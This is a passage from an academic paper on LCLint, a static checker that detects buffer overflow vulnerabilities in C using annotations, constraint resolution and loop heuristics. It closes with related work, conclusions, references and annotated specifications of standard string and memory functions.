for our analysis. Constraints are resolved at the statement level in the parse tree and above using axiomatic semantics techniques. Our analysis attempts to resolve constraints using postconditions of earlier statements and function preconditions. To aid in constraint resolution, we simplify constraints using standard algebraic techniques such as combining constants and substituting terms. We also use constraint-specific simplification rules such as maxSet(ptr + i) = maxSet(ptr) - i. We have similar rules for maxRead, minSet, and minRead. Constraints for statement lists are produced using normal axiomatic semantics rules and simple logic to combine the constraints of individual statements. For example, the code fragment 1 t++; 2 *t = ‘x’; 3 t++; leads to the constraints: requires maxSet(t @ 1:1) >= 1, ensures maxRead(t @ 3:4) >= -1 and ensures (t @ 3:4) = (t @ 1:1) + 2. The assignment to *t on line 2 produces the constraint requires maxSet(t @ 2:2) >= 0. The increment on line 1 produces the constraint ensures (t@1:4) = (t@1:1) + 1. The increment constraint is substituted into the maxSet constraint to produce requires maxSet (t@1:1 + 1) >= 0. Using the constraint-specific simplification rule, this simplifies to requires maxSet (t@1:1) - 1 >= 0 which further simplifies to requires maxSet(t @ 1:1) >= 1. Control Flow Statements involving control flow such as while and for loops and if statements, require more complex analysis than simple statement lists. For if statements and loops, the predicate often provides a guard that makes a possibly unsafe operation safe. In order to analyze such constructs well, LCLint must take into account the value of the predicate on different code paths. For each predicate, LCLint generates three lists of postcondition constraints: those that hold regardless of the truth value of the predicate, those that hold when the predicate evaluates to true, and those that hold when the predicate evaluates to false. To analyze an if statement, we develop branch specific guards based on our analysis of the predicate and use these guards to resolve constraints within the body. For example, in the statement if (sizeof (s1) > strlen (s2)) strcpy(s1, s2); if s1 is a fixed-size array, sizeof (s1) will be equal to maxSet(s1) + 1. Thus the if predicate allows LCLint to determine that the constraint maxSet(s1) >= maxRead(s2) holds on the true branch. Based on this constraint LCLint determines that the call to strcpy is safe. Looping constructs present additional problems. Previous versions of LCLint made a gross simplification of loop behavior: all for and while loops in the program were analyzed as though the body executed either zero or one times. Although this is clearly a ridiculous assumption, it worked surprisingly well for the types of analyses done by LCLint. For the buffer overflow analyses, this simplified view of loop semantics does not provide satisfactory results – to determine whether buf[i] is a potential buffer overflow, we need to know the range of values i may represent. Analyzing the loop as though its body executed only once would not provide enough information about the possible values of i. In a typical program verifier, loops are handled by requiring programmers to provide loop invariants. Despite considerable effort [Wegbreit75, Cousot77, Collins88, IS97, DLNS98, SI98], no one has yet been able to produce tools that generate suitable loop invariants automatically. Some promising work has been done towards discovering likely invariants by executing programs [ECGN99], but these techniques require well-constructed test suites and many problems remain before this could be used to produce the kinds of loop invariants we need. Typical programmers are not able or willing to annotate their code with loop invariants, so for LCLint to be effective we needed a method for handling loops that produces better results than our previous gross simplification method, but did not require expensive analyses or programmer-supplied loop invariants. Our solution is to take advantage of the idioms used by typical C programmers. Rather than attempt to handle all possible loops in a general way, we observe that a large fraction of the loops in most C programs are written in a stylized and structured way. Hence, we can develop heuristics for identifying and analyzing loops that match certain common idioms. When a loop matches a known idiom, corresponding heuristics can be used to guess how many times the loop body will execute. This information is used to add additional preconditions to the loop body that constrain the values of variables inside the loop. To further simplify the analysis, we assume that any buffer overflow that occurs in the loop will be apparent in either the first or last iterations. This is a reasonable assumption in almost all cases, since it would be quite rare for a program to contain a loop where the extreme values of loop variables were not on the first and last iterations. This allows simpler and more efficient loop checking. To analyze the first iteration of the loop, we treat the loop as an if statement and use the techniques described above. To analyze the last iteration we use a series of heuristics to determine the number of loop iterations and generate additional constraints based on this analysis. An example loop heuristic analyzes loops of the form for (index = 0; expr; index++) body where the body and expr do not modify the index variable and body does not contain a statement (e.g., a break) that could interfere with normal loop execution. Analyses performed by the original LCLint are used to aid loop heuristic pattern matching. For example, we use LCLint’s modification analyses to determine that the loop body does not modify the index variable. For a loop that matches this idiom, it is reasonable to assume that the number of iterations can be determined solely from the loop predicate. As with if statements, we generate three lists of postcondition constraints for the loop test. We determine the terminating condition of the loop by examining the list of postcondition constraints that apply specifically to the true branch. Within these constraints, we look for constraints of the form index <= e. For each of these constraints, we search the increment part of the loop header for constraints matching the form index = index + 1. If we find a constraint of this form, we assume the loop runs for e iterations. Of course, many loops that match this heuristic will not execute for e iterations. Changes to global state or other variables in the loop body could affect the value of e. Hence, our analysis is not sound or complete. For the programs we have tried so far, we have found this heuristic works correctly. Abstract syntax trees for loops are converted to a canonical form to increase their chances of matching a known heuristic. After canonicalization, this loop pattern matches a surprisingly high number of cases. For example, in the loop for (i = 0; buffer[i]; i++) body the postconditions of the loop predicate when the body executes would include the constraint ensures i < maxRead(buffer). This would match the pattern so LCLint could determine that the loop executes for maxRead(buffer) iterations. Several other heuristics are used to match other common loop idioms used in C programs. We can generalize the first heuristic to cases where the initial index value is not known. If LCLint can calculate a reasonable upper bound on the number of iterations (for example, if we can determine that the initial value of the index is always non-negative), it can determine an upper bound on the number of loop iterations. This can generate false positives if LCLint overestimates the actual number of loop iterations, but usually gives a good enough approximation for our purposes. Another heuristic recognizes a common loop form in which a loop increments and tests a pointer. Typically, these loops match the pattern: for (init; *buf; buf++) A heuristic detects this loop form and assumes that loop executes for maxRead(buf) iterations. After estimating the number of loop iterations, we use a series of heuristics to generate reasonable constraints for the last iteration. To do this, we calculate the value of each variable in the last iteration. If a variable is incremented in the loop, we estimate that in the last iteration the variable is the sum of the number of loop iterations and the value of the variable in the first iteration. For the loop to be safe, all loop preconditions involving the variable must be satisfied for the values of the variable in both the first and last iterations. This heuristic gives satisfactory results in many cases. Our heuristics were initially developed based on our analysis of wu-ftpd. We found that our heuristics were effective for BIND also. To handle BIND, a few addi­tional heuristics were added. In particular, BIND fre­quently used comparisons of pointer addresses to ensure a memory accesses is safe. Without an appro­priate heuristic, LCLint generated spurious warnings for these cases. We added appropriate heuristics to handle these situations correctly. While we expect experience with additional programs would lead to the addition of new loop heuristics, it is encouraging that only a few additional heuristics were needed to analyze BIND. Although no collection of loop heuristics will be able to correctly analyze all loops in C programs, our experience so far indicates that a small number of loop heuristics can be used to correctly analyze most loops in typical C programs. This is not as surprising as it might seem – most programmers learn to code loops from reading examples in standard texts or other people’s code. A few simple loop idioms are sufficient for programming many computations. Related Work In Section 2, we described run-time approaches to the buffer overflow problem. In this section, we compare our work to other work on static analysis. It is possible to find some program flaws using lexical analysis alone. Unix grep is often used to perform a crude analysis by searching for potentially unsafe library function calls. ITS4 is a lexical analysis tool that searches for security problems using a database of potentially dangerous constructs [VBKM00]. Lexical analysis techniques are fast and simple, but their power is very limited since they do not take into account the syntax or semantics of the program. More precise checking requires a deeper analysis of the program. Our work builds upon considerable work on constraint-based analysis techniques. We do not attempt to summarize foundational work here. For a summary see [Aiken99]. Proof-carrying code [NL 96, Necula97] is a technique where a proof is distributed with an executable and a verifier checks the proof guarantees the executable has certain properties. Proof-carrying code has been used to enforce safety policies constraining readable and writeable memory locations. Automatic con­struc­tion of proofs of memory safety for programs written in an unsafe language, however, is beyond current capabilities. Wagner, et al. have developed a system to statically detect buffer overflows in C [WFBA00, Wagner00]. They used their tool effectively to find both known and unknown buffer overflow vulnerabilities in a version of sendmail. Their approach formulates the problem as an integer range analysis problem by treating C strings as an abstract type accessed through library functions and modeling pointers as integer ranges for allocated size and length. A consequence of modeling strings as an abstract data type is that buffer overflows involving non-character buffers cannot be detected. Their system generates constraints similar to those generated by LCLint for operations involving strings. These constraints are not generated from annotations, but constraints for standard library functions are built in to the tool. Flow insensitive analysis is used to resolve the constraints. Without the localization provided by annotations, it was believed that flow sensitive analyses would not scale well enough to handle real programs. Flow insensitive analysis is less accurate and does not allow special handling of loops or if statements. Dor, Rodeh and Sagiv have developed a system that detects unsafe string operations in C programs [DRS01]. Their system performs a source-to-source trans­for­ma­tion that instruments a program with additional variables that describe string attributes and contains assert statements that check for unsafe string op­er­a­tions. The instrumented program is then analyzed statically using integer analysis to determine possible assertion failures. This approach can handle many com­plex properties such as over­lapping pointers. However, in the worst case the number of variables in the instrumented program is quadratic in the number of variables in the original program. To date, it has only been used on small example programs. Wagner’s prototype has been used effectively to find both known and previously unknown buffer overflow vulnerabilities in sendmail. Wagner’s prototype is known scale to fairly large applications. Versions of LCLint without buffer overflow checking scaled to vary large applications. The nature of our modifications suggests that our version of LCLint would continue to scale to very large applications. Wagner’s tool does not require adding annotations. This makes the up-front effort required to use the tool less than that required in order to use LCLint. However, human evaluation of error messages is by far the most time consuming part program analysis. As with LCLint, Wagner’s prototype produces a large number of spurious messages, and it is up to the programmer to determine which messages are spurious. If a large amount of time is spent on human analysis, the additional time spent on adding annotations is not likely to be significant. A process of human input and repeated checking may actually be faster than simply generating less accurate error messages. A few tools have been developed to detect array bounds errors in languages other than C. John McHugh developed a verification system that detects array bounds errors in the Gypsy language [McHugh84]. Extended Static Checking uses an automatic theorem-prover to detect array index bounds errors in Modula-3 and Java [DLNS98]. Extended Static Checking uses information in annotations to assist checking. Detecting array bounds errors in C programs is harder than for Modula-3 or Java, since those languages do not provide pointer arithmetic. Conclusions We have presented a lightweight static analysis tool for detecting buffer overflow vulnerabilities. It is neither sound nor complete; hence, it misses some vul­ner­a­bilities and produces some spurious warnings. Despite this, our experience so far indicates that it is useful. We were able to find both known and previously unknown buffer overflow vulnerabilities in wu-ftpd and BIND with a reasonable amount of effort using our approach. Further, the process of adding annotations is a con­struct­ive and useful step for understanding of a program and improving its maintainability. We believe it is realistic (albeit perhaps optimistic) to be­lieve programmers would be willing to add annota­tions to their programs if they are used to efficiently and clearly detect likely buffer overflow vulnerabilities (and other bugs) in their programs. An informal sam­pling of tens of thousands of emails received from LCLint users indicates that about one quarter of LCLint users add the annotations supported by previously released versions of LCLint to their programs. Perhaps half of those use annotations in sophisticated ways (and occasionally in ways the authors never imagined). Although the annotations required for effectively detecting buffer overflow vul­ner­abilities are somewhat more complicated, they are only an incremental step beyond previous annotations. In most cases, and certainly for security-sensitive programs, the benefits of doing so should far outweigh the effort required. These techniques, and static checking in general, will not provide the complete solution to the buffer overflow problem. We are optimistic, though, that this work repre­sents a step towards that goal. Availability LCLint source code and binaries for several platforms are available from http://lclint.cs.virginia.edu. Acknowledgements We would like to thank the NASA Langley Research Center for supporting this work. David Evans is also supported by an NSF CAREER Award. We thank John Knight, John McHugh, Chenxi Wang, Joel Winstead and the anonymous reviewers for their helpful and insightful comments. References [Aiken99] Alexander Aiken. Introduction to Set Constraint-Based Program Analysis. Science of Computer Programming, Volume 35, Numbers 2-3. November 1999. [AlephOne96] Aleph One. Smashing the Stack for Fun and Profit. BugTraq Archives. http://immunix.org/StackGuard/profit.html. [Andrews01] Mark Andrews. Personal communication, May 2001. [BST00] Arash Baratloo, Navjot Singh and Timothy Tsai. Transparent Run-Time Defense Against Stack-Smashing Attacks. 9th USENIX Security Symposium, August 2000. [Collins88] William J. Collins. The Trouble with For-Loop Invariants. 19 th SIGCSE Technical Symposium on Computer Science Education, February 1988. [Coolbaugh99] Liz Coolbaugh. Buffer Overflow Protection from Kernel Patches. Linux Weekly News, http://lwn.net/1999/1230/security.php3. [Cousot77] Patrick Cousot and Radhia Cousot. Abstract Interpretation: A Unified Lattice Model for Static Analysis of Programs by Construction or Approximation of Fixpoints. Fourth ACM Sympo­sium on Principles of Programming Languages, January 1977. [CPMH+98] Crispin Cowan, Calton Pu, David Maier, Heather Hinton, Peat Bakke, Steve Beattie, Aaron Grier, Perry Wagle and Qian Zhang. Automatic Detection and Prevention of Buffer-Overflow Attacks. 7th USENIX Security Symposium, January 1998. [CBDP+99] Crispin Cowan, Steve Beattie, Ryan Finnin Day, Calton Pu, Perry Wagle and Erik Walthinsen. Protecting Systems from Stack Smashing Attacks with StackGuard. Linux Expo. May 1999. (Updated statistics at http://immunix.org/StackGuard/performance.html) [CWPBW00] Crispin Cowan, Perry Wagle, Calton Pu, Steve Beattie and Jonathan Walpole. Buffer Overflows: Attacks and Defenses for the Vulnerability of the Decade. DARPA Information Survivability Conference and Exposition. January 2000. [DLNS98] David Detlefs, K. Rustan M. Leino, Greg Nelson and James B. Saxe. Extended Static Checking. Research Report, Compaq Systems Research Center. December 18, 1998. [DRS01] Nurit Dor, Michael Rodeh and Mooly Sagiv. Cleanness Checking of String Manipulations in C Programs via Integer Analysis. 8th International Static Analysis Symposium. To appear, July 2001. [ES99] Úlfar Erlingsson and Fred B. Schneider. SASI Enforcement of Security Policies: A Retrospective. New Security Paradigms Workshop. September 1999. [ES00] Ulfar Erlingsson and Fred B. Schneider. IRM Enforcement of Java Stack Inspection. IEEE Symposium on Security and Privacy. May 2000. [ECGN99] Michael D. Ernst, Jake Cockrell, William G. Griswold and David Notkin. Dynamically Discovering Likely Program Invariants to Support Program Evolution. International Conference on Software Engineering. May 1999. [EGHT94] David Evans, John Guttag, Jim Horning and Yang Meng Tan. LCLint: A Tool for Using Specifications to Check Code. SIGSOFT Symposium on the Foundations of Software Engineering. December 1994. [Evans96] David Evans. Static Detection of Dynamic Memory Errors. SIGPLAN Conference on Programming Language Design and Implementation. May 1996. [ET99] David Evans and Andrew Twyman. Flexible Policy-Directed Code Safety. IEEE Symposium on Security and Privacy. May 1999. [Evans00a] David Evans. Policy-Directed Code Safety. MIT PhD Thesis. February 2000. [Evans00b] David Evans. Annotation-Assisted Lightweight Static Checking. First International Workshop on Automated Program Analysis, Testing and Verification. June 2000. [Evans00c] David Evans. LCLint User’s Guide, Version 2.5. May 2000. http://lclint.cs.virginia.edu/guide/ [FBF99] Timothy Fraser, Lee Badger and Mark Feldman. Hardening COTS Software with Generic Software Wrappers. IEEE Symposium on Security and Privacy. May 1999. [GWTB96] Ian Goldberg, David Wagner, Randi Thomas and Eric A. Brewer. A Secure Environment for Untrusted Helper Applications: Confining the Wily Hacker. 6th USENIX Security Symposium. July 1996. [GH93] John V. Guttag and James J. Horning, editors, with Stephen J. Garland, Kevin D. Jones, Andrés Modet and Jennette M. Wing. Larch: Languages and Tools for Formal Specification. Springer-Verlag. 1993. [IS97] A. Ireland and J. Stark. On the Automatic Discovery of Loop Invariants. 4th NASA Langley Formal Methods Workshop. September 1997. [ISO99] ISO/IEC 9899 International Standard. Programming Languages – C. December 1999. Approved by ANSI May 2000. [LHSS00] David Larochelle, Yanlin Huang, Avneesh Saxena and Seejo Sebastine. Static Detection of Buffer Overflows in C using LCLint. Unpublished report available from the authors. May 2000. [Luckin01] Bob Luckin. Personal communication, April 2001. [Lundberg01] Gregory A Lundberg. Personal communication, April 2001. [McHugh84] John McHugh. Towards the Generation of Efficent Code form Verified Programs. Technical Report 40, Institute for Computing Science, University of Texas at Austin PhD Thesis, 1984. [Necula97] George C. Necula. Proof-Carrying Code. 24th ACM SIGPLAN-SIGACT Symposium on Principles of Programming Langauges, January 1997. [NL96] George C. Necula and Peter Lee. Safe Kernel Extensions Without Run-Time Checking. 2nd Symposium on Operating Systems Design and Implementation, October 1996. [Orcero00] David Santo Orcero. The Code Analyzer LCLint. Linux Journal. May 2000. [Pethia00] Richard D. Pethia. Bugs in Programs. Keynote address at SIGSOFT Foundations of Software Engineering. November 2000. [PG00] Pramode C E and Gopakumar C E. Static Checking of C programs with LCLint. Linux Gazette Issue 51. March 2000. [RE89] Jon Rochlis and Mark Eichin. With Microscope and Tweezers: the Worm from MIT’s Perspective. Communications of the ACM. June 1989. [Snow99] Brian Snow. Future of Security. Panel presentation at IEEE Security and Privacy. May 1999. [Spafford88] Eugene Spafford. The Internet Worm Program: An Analysis. Purdue Tech Report 832. 1988. [SI98] J. Stark and A. Ireland. Invariant Discovery Via Failed Proof Attempts. 8th International Workshop on Logic Based Program Synthesis and Transformation. June 1998. [Torvalds98] Linus Torvalds. Message archived in Linux Weekly News. August 1998. http://lwn.net/980806/a/linus-noexec.html [VBKM00] John Viega, J.T. Bloch, Tadayoshi Kohno and Gary McGraw. ITS4 : A Static Vulnerability Scanner for C and C++ Code. Annual Computer Security Applications Conference. December 2000. [WFBA00] David Wagner, Jeffrey S. Foster, Eric A. Brewer and Alexander Aiken. A First Step Towards Automated Detection of Buffer Overrun Vulnerabilities. Network and Distributed System Security Symposium. February 2000. [Wagner00] David Wagner. Static Analysis and Computer Security: New Techniques for Software Assurance. University of California, Berkeley, PhD Thesis, 2000. [WLAG93] Robert Wahbe, Steven Lucco, Thomas E. Anderson and Susan L. Graham. Efficient Software-Based Fault Isolation. 14th ACM Symposium on Operating Systems Principles, 1993. [Wegbreit75] Ben Wegbreit. Property Extraction in Well-Founded Property Sets. IEEE Transactions on Software Engineering, September 1975. [WSJ01] The Wall Street Journal. Researchers Find Software Flaw Giving Hackers Key to Web Sites. January 30, 2001. A. Annotated Selected C Library Functions char *strcpy (char *s1, char *s2) /*@requires maxSet(s1) >= maxRead(s2)@*/ /*@ensures maxRead(s1) == maxRead (s2) /\ result == s1@*/; char *strncpy (char *s1, char *s2, size_t n) /*@requires maxSet(s1) >= n – 1@*/ /*@ensures maxRead (s1) <= maxRead(s2) /\ maxRead (s1) <= (n – 1) /\ result == s1@*/; char *strcat (char *s1, char *s2) /*@requires maxSet(s1) >= (maxRead(s1) + maxRead(s2))@*/ /*@ensures maxRead(s1) == maxRead(s1) + maxRead(s2) /\ result == s1@*/; strncat (char *s1, char *s2, int n) /*@requires maxSet(s1) >= maxRead(s1) + n@*/ /*@ensures maxRead(result) >= maxRead(s1) + n@*/; extern size_t strlen (char *s) /*@ensures result == maxRead(s)@*/; void *calloc (size_t nobj, size_t size) /*@ensures maxSet(result) == nobj@*/; void *malloc (size_t size) /*@ensures maxSet(result) == size@*/; These annotations were determined based on ISO C standard [ISO99]. Note that the semantics of strncpy and strncat are different – strncpy writes exactly n characters to the buffer but does not guarantee that a null character is added; strncat appends n characters to the buffer and a null character. The ensures clauses reveal these differences clearly. The full specifications for malloc and calloc also include null annotations on the result that indicate that they may return NULL. Existing LCLint checking detects dereferencing a potentially null pointer. As a result, the implicit actual postcondition for malloc is maxSet(result) == size Ú result == null. LCLint does not support general disjunctions, but possibly NULL values can be handled straightforwardly. [1] We can trivially reduce the halting problem to the buffer overflow detection problem by inserting code that causes a buffer overflow before all halt instructions. [2] The original Larch C interface language LCL [GH93], on which LCLint’s annotation language was based, did include a notion of general preconditions and post­conditions specified by requires and ensures clauses. [3] LCLint also supports a nullterminated annotation that denotes storage that is terminated by the null character. Many C library functions require null-terminated strings, and can produce buffer overflow vulnerabilities if they are passed a string that is not properly null-terminated. We do not cover the nullterminated annotation and related checking in this paper. For information on it, see [LHSS00]. [4] The standard library specification of strcpy also includes other LCLint annotations: a modifies clause that indicates that the only thing that may be modified by strcpy is the storage referenced by s1, an out annotation on s1 to indicate that it need not point to defined storage when strcpy is called, a unique annotation on s1 to indicate that it may not alias the same storage as s2, and a returned annotation on s1 to indicate that the returned pointer references the same storage as s1. For clarity, the examples in this paper show only the annotations directly relevant to detecting buffer overflow vulnerabilities. For more information on other LCLint annotations, see [Evans96, Evans00c]. [5] The source code for wu-ftpd is available from http://www.wu-ftpd.org. We analyzed the version in ftp://ftp.wu-ftpd.org/pub/wu-ftpd-attic/wu-ftpd-2.5.0.tar.gz. We configured wu-ftpd using the default configuration for FreeBSD systems. Since LCLint performs most of its analyses on code that has been pre-processed, our analysis did not examine platform-specific code in wu-ftpd for platforms other than FreeBSD. [6] For our prototype implementation, we have not yet attempted to produce messages that can easily be interpreted by typical programmers. Instead, we generate error messages that reveal information useful to the LCLint developers. Generating good error messages is a challenging problem; we plan to devote more effort to this before publicly releasing our tool. [7] Because strncpy does not guarantee null termination, it is necessary to explicitly put a null character at the end of the buffer. [8] Advisories for this vulnerability can be found at http://www.cert.org/advisories/CA-1999-13.html and ftp://www.auscert.org.au/security/advisory/AA-1999.01.wu-ftpd.mapping_chdir.vul. [9] The source code is available at ftp://ftp.isc.org/isc/bind/src/8.2.2-P7/bind-src.tar.gz [10] An advisory for this vulnerability can be found at http://lwn.net/2001/0201/a/covert-bind.php3.